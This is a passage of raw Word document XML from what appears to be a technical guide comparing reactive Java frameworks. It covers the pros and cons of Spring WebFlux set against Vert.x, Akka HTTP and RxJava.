        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actor-based concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is used in highly reliable systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC6598"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onclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662513D"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Best suited for developers already invested in the Spring ecosystem who want to build scalable, reactive applications with familiar Spring tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D33C8C"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Vert.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ideal for lightweight, high-performance applications that require </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>low-latency</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high concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and are built around the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>event-driven</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C680DB"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Akka HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Best for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or applications that need to scale horizontally and work with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>actor model</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streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784A1BA9"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ach of these frameworks excels in different areas, and the choice depends on your application's needs, the team's familiarity with the frameworks, and the underlying architectural goals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0A688"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A88BC2C">
          <v:rect id="_x0000_i2334" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1A053" w14:textId="0AD724DA" w:rsidR="00163F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A4102" w:rsidP="004A4102">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="531" w:name="_Toc196308011"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are the pros and cons of using Spring WebFlux compared to other reactive frameworks</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="531"/>
    </w:p>
    <w:p w14:paraId="11F4861A" w14:textId="6CA3CA20" w:rsidR="00B506B2" w:rsidRPr="00B13F85" w:rsidRDefault="00B506B2"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Spring WebFlux offers several advantages and some trade-offs when compared to other reactive frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vert.x</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Akka HTTP</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RxJava</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Here's a breakdown of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pros</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cons</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of using </w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC93CBA"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Pros of Using Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BAEFE"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 Integration with the Spring Ecosystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E53731"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lastRenderedPageBreak/>
        <w:t>Seamless Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If you are already using the Spring ecosystem (Spring Boot, Spring Security, Spring Data, Spring Cloud, etc.), Spring WebFlux integrates seamlessly with these tools, reducing configuration complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79832272"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Familiarity</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux uses familiar Spring programming models, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@RestController, @RequestMapping) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with Spring's IoC container, making it easier for teams already skilled in Spring to adopt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD72D7"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2. Comprehensive Reactive Programming Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BB6CAA"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ctor-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Built on top of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor library</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which implements the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactive Streams API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Mono and Flux), ensuring a standard approach to reactive programming across Java ecosystems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B445EF7"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Declarative API</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The reactive streams model (using </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mono</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Flux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) provides a clean and declarative way to model asynchronous operations, backpressure, and concurrency, which can be easier to manage than callbacks or complex threading models.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FC2631"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3. Non-Blocking I/O (High Scalability):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C51E4F7"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fficient Resource Usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux leverages </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Netty</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Undertow</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as servers, which are optimized for non-blocking I/O, enabling high concurrency with fewer resources compared to traditional, blocking I/O frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring MVC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC9B64B"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Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When designed correctly, applications built with Spring WebFlux can handle large numbers of concurrent requests (e.g., real-time apps, chat apps) with better throughput and less CPU overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51631790"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4. Ease of Use with Functional Endpoints:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618BD19E"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Functional Programming Style</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux supports both </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotation-based</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> programming (e.g., @RestController) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional endpoints</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using RouterFunctions), providing flexibility in how you design and implement routes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF5803A"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Declarative Error Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Offers a clean way to handle errors and manage retries or fallbacks in a declarative fashion using operators like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>onErrorResume</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onErrorReturn</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24450524"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5. Full Support for Reactive Data Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E30847"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ctive Data Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: WebFlux works well with reactive data stores like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MongoDB</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Cassandra</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R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Spring Data provides reactive repositories, and there are rich integrations with reactive drivers for databases like MongoDB and PostgreSQL, making it easier to integrate databases into reactive applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC1493C"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6. Testing Support:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68235A89"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pring Test Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since WebFlux is part of the Spring ecosystem, it benefits from tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Test</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WebTestClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which are designed for writing tests in a reactive context. Testing asynchronous components becomes easier and more structured.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F552E82"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7. Comprehensive Documentation &amp; Community:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E60AEA"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Mature Ecosystem</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spring WebFlux benefits from the broad and mature </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> community, extensive documentation, tutorials, and learning resources, making it easier to get started and troubleshoot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213D9D1C"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nterprise Support</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Being part of the Spring Framework, WebFlux is backed by </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Pivotal (VMware)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, providing enterprise-level support for mission-critical applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0F670"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ons of Using Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB1A87"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 Complexity for Beginners:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F57FD7"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Learning Curve</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Reactive programming concepts such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</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monads (Mono, Flux)</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stream operators</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be difficult to grasp for developers unfamiliar with reactive patterns. Debugging non-blocking code can also be more challenging compared to traditional imperative code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053629EF"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quires Understanding of Reactive Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: To effectively use WebFlux, developers need a strong understanding of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> principles. Transitioning from a traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
